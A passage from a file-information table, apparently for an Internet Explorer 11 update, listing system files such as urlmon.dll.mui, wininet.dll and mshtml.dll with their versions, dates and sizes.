\nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 71,680 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 71,168 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,632 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 68,096 \nF12Resources.dll.mui| 
11.0.9600.17278| 16-Aug-2014| 5:03| 68,608 \nF12Resources.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 68,096 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 59,904 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 65,536 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 69,120 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 29,696 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 30,720 \nF12Resources.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 30,720 \nJavaScriptCollectionAgent.dll| 11.0.9600.19963| 12-Feb-2021| 18:47| 77,824 \nDiagnosticsHub.ScriptedSandboxPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 276,480 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 46,080 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 51,712 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 54,272 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 12:08| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 45,056 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,936 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 39,424 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 47,616 
\nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 51,200 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:19| 50,688 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 50,176 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:23| 49,664 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:12| 48,640 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:14| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 49,152 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 48,128 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:15| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nurlmon.dll.mui| 11.0.9600.18378| 11-Jun-2016| 13:20| 35,328 \nwininet.dll| 11.0.9600.20112| 13-Aug-2021| 19:48| 4,858,880 \njsproxy.dll| 11.0.9600.17416| 30-Oct-2014| 21:57| 54,784 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 114,176 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 124,928 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 122,880 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 130,048 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 138,240 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18666| 16-Apr-2017| 2:49| 114,688 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:38| 131,584 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:39| 117,760 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 122,368 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 134,144 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:40| 107,008 
\ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:36| 127,488 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 128,512 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 88,064 \ninetcpl.cpl.mui| 11.0.9600.18838| 14-Oct-2017| 2:53| 82,944 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 123,392 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:21| 120,320 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:18| 130,560 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:19| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 125,952 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 128,000 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:17| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 129,024 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:16| 123,904 \ninetcpl.cpl.mui| 11.0.9600.20112| 13-Aug-2021| 23:22| 124,416 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:18| 121,856 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 115,712 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:14| 123,904 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 125,440 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 16:13| 74,752 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:16| 75,776 \ninetcpl.cpl.mui| 11.0.9600.18817| 7-Sep-2017| 17:17| 75,776 \nieui.dll| 11.0.9600.20045| 4-Jun-2021| 22:15| 615,936 \niedkcs32.dll| 18.0.9600.20045| 4-Jun-2021| 21:45| 381,952 \ninstall.ins| Not versioned| 13-Aug-2021| 17:52| 464 \nieapfltr.dat| 10.0.9301.0| 23-Sep-2013| 19:22| 616,104 \nieapfltr.dll| 11.0.9600.20112| 13-Aug-2021| 19:11| 800,768 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:41| 145,920 \nlicmgr10.dll| 11.0.9600.17416| 30-Oct-2014| 21:40| 33,280 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:47| 88,064 
\nDiagnosticsHub.DataWarehouse.dll| 11.0.9600.18895| 1-Jan-2018| 21:32| 666,624 \niedvtool.dll| 11.0.9600.20045| 5-Jun-2021| 0:16| 950,784 \nDiagnosticsHub_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:21| 50,176 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:53| 491,008 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:40| 316,416 \nEscMigPlugin.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 124,416 \nescUnattend.exe| 11.0.9600.19326| 25-Mar-2019| 22:54| 87,040 \nMicrosoft-Windows-IE-F12-Provider.ptxml| Not versioned| 15-Aug-2014| 15:51| 11,892 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:00| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 15-Aug-2014| 20:19| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:59| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:02| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:01| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:04| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.20112| 
13-Aug-2021| 23:23| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 4,096 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 5:03| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nF12.dll.mui| 11.0.9600.17278| 16-Aug-2014| 4:58| 3,584 \nDiagnosticsTap.dll| 11.0.9600.19963| 12-Feb-2021| 18:51| 245,248 \nF12Resources.dll| 11.0.9600.17496| 21-Nov-2014| 19:00| 10,949,120 \nF12Tools.dll| 11.0.9600.19963| 12-Feb-2021| 18:50| 372,224 \nF12.dll| 11.0.9600.20045| 4-Jun-2021| 21:50| 1,422,848 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:42| 809,472 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:54| 1,518 \nmsfeedsbs.mof| Not versioned| 21-Aug-2013| 23:54| 1,574 \nmsfeedsbs.dll| 11.0.9600.19650| 11-Feb-2020| 5:16| 60,416 \nmsfeedssync.exe| 11.0.9600.17416| 30-Oct-2014| 22:08| 12,800 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 13,824 \nmshtmled.dll| 11.0.9600.20045| 4-Jun-2021| 21:55| 92,672 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 22:07| 25,759,232 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 3:30| 2,724,864 \nMicrosoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:41| 3,228 \nIEAdvpack.dll| 11.0.9600.17416| 30-Oct-2014| 21:54| 132,096 \nieetwcollector.exe| 11.0.9600.18895| 1-Jan-2018| 21:17| 116,224 \nieetwproxystub.dll| 11.0.9600.18895| 1-Jan-2018| 21:28| 48,640 \nieetwcollectorres.dll| 11.0.9600.16518| 6-Feb-2014| 3:30| 4,096 \nielowutil.exe| 11.0.9600.17416| 30-Oct-2014| 21:55| 222,720 \nieproxy.dll| 11.0.9600.20045| 4-Jun-2021| 21:13| 870,400 \nIEShims.dll| 11.0.9600.19650| 11-Feb-2020| 4:29| 387,072 \niexpress.exe| 11.0.9600.17416| 30-Oct-2014| 22:10| 167,424 \nwextract.exe| 11.0.9600.17416| 30-Oct-2014| 22:12| 143,872 \nimgutil.dll| 11.0.9600.19963| 12-Feb-2021| 18:08| 51,712 \nWindows Pop-up Blocked.wav| Not versioned| 23-Sep-2013| 20:25| 85,548 \nWindows Information Bar.wav| Not versioned| 23-Sep-2013| 20:25| 23,308 \nWindows Feed Discovered.wav| Not versioned| 
23-Sep-2013| 20:25| 19,884 \nWindows Navigation Start.wav| Not versioned| 23-Sep-2013| 20:25| 11,340 \nbing.ico| Not versioned| 23-Sep-2013| 19:51| 5,430 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 21:51| 144,384 \nMicrosoft-Windows-IE-InternetExplorer-ppdlic.xrm-ms| Not versioned| 13-Aug-2021| 22:36| 2,956 \njsdbgui.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 591,872 \njsprofilerui.dll| 11.0.9600.19963| 12-Feb-2021| 18:44| 628,736 \nMemoryAnalyzer.dll| 11.0.9600.19963| 12-Feb-2021| 19:01| 1,862,656 \nMshtmlDac.dll| 11.0.9600.19846| 23-Sep-2020| 21:25| 88,064 \nnetworkinspection.dll| 11.0.9600.19963| 12-Feb-2021| 18:38| 1,217,024 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 21:19| 152,064 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:43| 65 \nwebcheck.dll| 11.0.9600.20045| 4-Jun-2021| 21:44| 262,144 \ndesktop.ini| Not versioned| 18-Jun-2013| 7:44| 65 \npdm.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 579,192 \nmsdbg2.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 403,592 \npdmproxy100.dll| 12.0.41202.0| 30-Sep-2014| 16:01| 107,152 \nmsrating.dll| 11.0.9600.18895| 1-Jan-2018| 20:56| 199,680 \nicrav03.rat| Not versioned| 23-Sep-2013| 19:32| 8,798 \nticrf.rat| Not versioned| 23-Sep-2013| 19:32| 1,988 \niertutil.dll| 11.0.9600.20064| 14-Jun-2021| 21:56| 2,916,864 \nie4uinit.exe| 11.0.9600.19963| 12-Feb-2021| 18:28| 728,064 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 21:56| 34,304 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 66,560 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:58| 16,303 \ninseng.dll| 11.0.9600.19101| 18-Jul-2018| 21:03| 107,520 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 21:29| 111,616 \nTimeline.dll| 11.0.9600.19963| 12-Feb-2021| 18:45| 219,648 \nTimeline_is.dll| 11.0.9600.19963| 12-Feb-2021| 19:07| 172,032 \nTimeline.cpu.xml| Not versioned| 24-Jul-2014| 11:58| 3,197 \nVGX.dll| 11.0.9600.19963| 12-Feb-2021| 18:43| 1,018,880 \nurl.dll| 11.0.9600.17416| 30-Oct-2014| 22:06| 237,568 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,066,432 
\nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,121,216 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,075,136 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,063,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,314,240 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,390,528 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,034,176 \nieframe.dll.mui| 11.0.9600.19846| 23-Sep-2020| 23:22| 2,033,152 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,255,872 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,061,312 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,326,016 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,019,840 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,071,040 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 2,082,816 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,307,584 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,170,368 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,153,984 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:15| 2,291,712 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:16| 2,283,520 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,052,096 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:17| 2,301,952 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:18| 2,093,056 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,075,648 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,299,392 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,094,592 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:12| 2,316,800 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:10| 2,305,536 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,278,912 \nieframe.dll.mui| 11.0.9600.20112| 13-Aug-2021| 23:24| 2,286,080 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:11| 2,060,288 \nieframe.dll.mui| 11.0.9600.19846| 
24-Sep-2020| 0:13| 2,315,776 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,278,912 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,324,992 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:13| 2,098,176 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll.mui| 11.0.9600.19846| 24-Sep-2020| 0:14| 1,890,304 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 15,506,432 \nieframe.ptxml| Not versioned| 5-Feb-2014| 21:41| 24,486 \nieinstal.exe| 11.0.9600.18639| 25-Mar-2017| 10:20| 492,032 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 526,294 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 499,654 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 552,337 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 944,559 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:14| 457,561 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 543,946 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 526,557 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 575,838 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:01| 570,737 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,119 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 639,271 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:57| 525,504 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 488,488 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 548,494 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:56| 559,343 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 535,067 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 541,455 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:03| 804,470 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:00| 503,909 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 521,583 \nInetRes.adml| Not versioned| 12-Feb-2021| 22:02| 420,082 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \nInetRes.adml| Not versioned| 12-Feb-2021| 21:59| 436,651 \ninetres.admx| Not versioned| 8-Feb-2021| 20:02| 1,678,023 \ninetcomm.dll| 6.3.9600.20112| 13-Aug-2021| 
19:48| 1,033,216 \nINETRES.dll| 6.3.9600.16384| 22-Aug-2013| 4:43| 84,480 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 20:47| 5,508,096 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 19:03| 814,592 \njscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:12| 785,408 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:22| 581,120 \niexplore.exe| 11.0.9600.19036| 24-May-2018| 22:24| 817,296 \nhtml.iec| 2019.0.0.18895| 1-Jan-2018| 20:51| 341,504 \nieui.dll| 11.0.9600.18895| 1-Jan-2018| 20:44| 476,160 \niepeers.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 128,512 \ntdc.ocx| 11.0.9600.19963| 12-Feb-2021| 18:24| 73,728 \ndxtmsft.dll| 11.0.9600.19963| 12-Feb-2021| 18:29| 415,744 \ndxtrans.dll| 11.0.9600.19963| 12-Feb-2021| 18:20| 280,064 \nmsfeeds.dll| 11.0.9600.20112| 13-Aug-2021| 19:35| 696,320 \nmsfeeds.mof| Not versioned| 5-Feb-2014| 21:53| 1,518 \nmshta.exe| 11.0.9600.17416| 30-Oct-2014| 20:28| 12,800 \nmshtmled.dll| 11.0.9600.19963| 12-Feb-2021| 18:21| 76,800 \nmshtml.dll| 11.0.9600.20112| 13-Aug-2021| 20:33| 20,294,144 \nmshtml.tlb| 11.0.9600.16518| 6-Feb-2014| 2:20| 2,724,864 \nwow64_Microsoft-Windows-IE-HTMLRendering.ptxml| Not versioned| 5-Feb-2014| 21:43| 3,228 \nieetwproxystub.dll| 11.0.9600.17416| 30-Oct-2014| 20:23| 47,616 \nieUnatt.exe| 11.0.9600.17416| 30-Oct-2014| 20:12| 115,712 \noccache.dll| 11.0.9600.17416| 30-Oct-2014| 19:48| 130,048 \nwebcheck.dll| 11.0.9600.19963| 12-Feb-2021| 18:13| 230,400 \niernonce.dll| 11.0.9600.17416| 30-Oct-2014| 20:15| 30,720 \niesetup.dll| 11.0.9600.17416| 30-Oct-2014| 20:24| 62,464 \nieuinit.inf| Not versioned| 12-Mar-2015| 18:55| 16,303 \niesysprep.dll| 11.0.9600.17416| 30-Oct-2014| 19:56| 90,624 \nieframe.dll| 11.0.9600.20112| 13-Aug-2021| 19:47| 13,881,856 \nie9props.propdesc| Not versioned| 23-Sep-2013| 19:34| 2,843 \nwow64_ieframe.ptxml| Not versioned| 5-Feb-2014| 21:43| 24,486 \njscript9.dll| 11.0.9600.20112| 13-Aug-2021| 19:52| 4,119,040 \njscript9diag.dll| 11.0.9600.19963| 12-Feb-2021| 18:37| 620,032 \njscript.dll| 
5.8.9600.20112| 13-Aug-2021| 19:56| 653,824 \nvbscript.dll| 5.8.9600.20112| 13-Aug-2021| 20:04| 498,176 \nactxprxy.dll| 6.3.9600.20045| 4-Jun-2021| 21:32| 1,049,600 \nhlink.dll| 6.3.9600.19101| 18-Jul-2018| 20:55| 99,328 \npngfilt.dll| 11.0.9600.19963| 12-Feb-2021| 18:49| 58,368 \nurlmon.dll| 11.0.9600.20112| 13-Aug-2021| 19:19| 1,342,976 \nWininetPlugin.dll| 6.3.9600.17416| 30-Oct-2014| 20:12| 35,328 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 46,592 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 56,320 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 57,856 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 11:17| 49,664 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 47,616 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 49,152 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 55,296 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 45,056 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 39,424 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:32| 35,840 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:31| 53,760 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 54,272 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 54,272 \nwininet.dll.mui| 
11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:29| 51,200 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 53,248 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 52,736 \nwininet.dll.mui| 11.0.9600.20112| 13-Aug-2021| 21:44| 51,712 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:30| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:27| 50,688 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 50,176 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 12:28| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \nwininet.dll.mui| 11.0.9600.18538| 12-Nov-2016| 13:30| 31,232 \ninetcpl.cpl| 11.0.9600.20045| 4-Jun-2021| 21:30| 2,058,752 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 307,200 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 293,888 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:52| 290,304 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 289,280 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 299,008 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 303,104 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:49| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 20:58| 282,112 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:51| 296,960 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 283,648 \nmshtml.dll.mui| 11.0.9600.19404| 9-Jul-2019| 21:50| 291,840 \nmshtml.dll.mui| 11.0.9600.19404| 